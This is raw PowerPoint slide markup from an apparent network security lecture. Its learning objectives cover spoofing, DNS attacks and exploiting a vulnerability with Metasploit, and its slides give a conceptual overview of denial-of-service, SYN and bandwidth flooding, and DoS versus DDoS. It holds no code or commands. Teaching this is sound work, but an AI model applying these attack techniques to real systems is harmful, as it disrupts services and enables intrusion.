                <a:spcPts val="1422"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Understand the difficulty in stopping packet spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1422"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Explain and apply various techniques to exploit systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1422"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Understand how DNS works and describe the various DNS attacks in detail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1422"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Be able to define basic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> terms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1422"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Be able to exploit a basic vulnerability using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1422"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AF0716D7-8413-4269-8B77-F22C1C40A2F8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="114688967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0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="325437"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F1C94AF0-E990-42F4-BE8D-90547237436A}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="914400"/>
            <a:ext cx="11703050" cy="9048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Denial-of-Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19460" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="581025" y="3679825"/>
            <a:ext cx="5418138" cy="4775200"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130046" tIns="65023" rIns="130046" bIns="65023" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vulnerability attack: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Send a few crafted messages to target app that has vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Malicious messages called the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2800">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Remotely stopping or crashing services</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19461" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6426200" y="3581400"/>
            <a:ext cx="6318250" cy="4572000"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130046" tIns="65023" rIns="130046" bIns="65023" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Connection flooding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Overwhelming connection queue with SYN flood</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bandwidth flooding attack:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Overwhelming communications link with packets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Strength in flooding attack lies in volume rather than content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19462" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="1828800"/>
            <a:ext cx="10639425" cy="2138363"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="ZapfDingbats" pitchFamily="82" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Prevent access by legitimate users or stop critical system processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="325437"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{980D5B2E-AFFE-478B-B23C-168429C2AD1C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="482600" y="914400"/>
            <a:ext cx="11703050" cy="9048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Denial-of-Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20484" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="558800" y="2057399"/>
            <a:ext cx="11506200" cy="7370763"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130046" tIns="65023" rIns="130046" bIns="65023" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Very popular attack today</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Late 2012 attacks on the US Financial Vertical</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Attacks against financial customers are ongoing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Recent attacks against NY Times and Twitter by the Syrian Electronic Army (August 2013)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Global political events now tend to precipitate DDOS attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400" dirty="0" err="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>source of attack small # of nodes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>source IP typically spoofed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400" dirty="0" err="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>DDoS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3400" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>From thousands of nodes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>IP addresses often not spoofed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>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xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="325437"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{825A4F90-FB54-4CA9-9D30-6CC3E8BED552}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22531" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="482600" y="762000"/>
            <a:ext cx="11053763" cy="111125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Interlude: IP datagram format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22532" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4198938" y="2211388"/>
            <a:ext cx="5619750" cy="6861175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22533" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4064000" y="2362200"/>
            <a:ext cx="5619750" cy="6834188"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22534" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4014788" y="2454275"/>
            <a:ext cx="693737" cy="531813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
